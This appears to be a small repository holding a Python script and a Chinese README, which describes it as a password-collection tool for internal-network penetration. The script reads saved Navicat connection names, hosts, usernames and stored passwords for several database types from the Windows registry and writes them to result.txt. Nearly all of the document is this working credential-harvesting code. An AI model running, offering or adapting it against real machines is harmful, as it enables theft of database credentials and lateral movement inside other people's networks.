├── Navicat.py └── README.md /Navicat.py: -------------------------------------------------------------------------------- 1 | from winreg import OpenKey, HKEY_CURRENT_USER, EnumKey, EnumValue 2 | 3 | regs = {'mssql': r'Software\PremiumSoft\NavicatMSSQL\Servers', 'mysql': r'Software\PremiumSoft\Navicat\Servers', 4 | 'oracle': r'Software\PremiumSoft\NavicatOra\Servers', 'pgsql': r'Software\PremiumSoft\NavicatPG\Servers', 5 | 'MariaDB': r'Software\PremiumSoft\NavicatMARIADB\Servers'} 6 | 7 | 8 | def get_info(dbname,reg): 9 | key = OpenKey(HKEY_CURRENT_USER,reg) 10 | 11 | # 连接名 12 | conns = [] 13 | try: 14 | i = 0 15 | while 1: 16 | name = EnumKey(key,i) 17 | conns.append(name) 18 | i += 1 19 | except: 20 | pass 21 | 22 | # 主机名 23 | hosts = [] 24 | # 用户名 25 | usernames = [] 26 | # 密码 27 | passwords = [] 28 | for i in conns: 29 | key = OpenKey(HKEY_CURRENT_USER,reg + '\\' + i) 30 | try: 31 | j = 0 32 | while 1: 33 | name, value, type = EnumValue(key, j) 34 | if name == 'Host': 35 | hosts.append(value) 36 | if name == 'UserName': 37 | usernames.append(value) 38 | if name == 'Pwd': 39 | passwords.append(value) 40 | j += 1 41 | except: 42 | pass 43 | with open('result.txt', 'a') as f: 44 | f.write('\n' + dbname + ' connections:' + '\n') 45 | for i in range(len(hosts)): 46 | with open('result.txt', 'a') as f: 47 | f.write(' conn_name:' + conns[i] + ' ' + 'host_name:'+ hosts[i] + ' ' 48 | + 'username:' + usernames[i] + ' ' + 'password:' + passwords[i] + '\n') 49 | 50 | 51 | if __name__ == '__main__': 52 | for i, j in regs.items(): 53 | try: 54 | get_info(i, j) 55 | except: 56 | continue 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## 介绍 2 | 内网渗透中常用到的收集密码的脚本。 3 | 4 | ### Navicat.py 5 | 获取目标`navicat`保存的连接记录,包括连接名、主机、用户名、密码。 6 | --------------------------------------------------------------------------------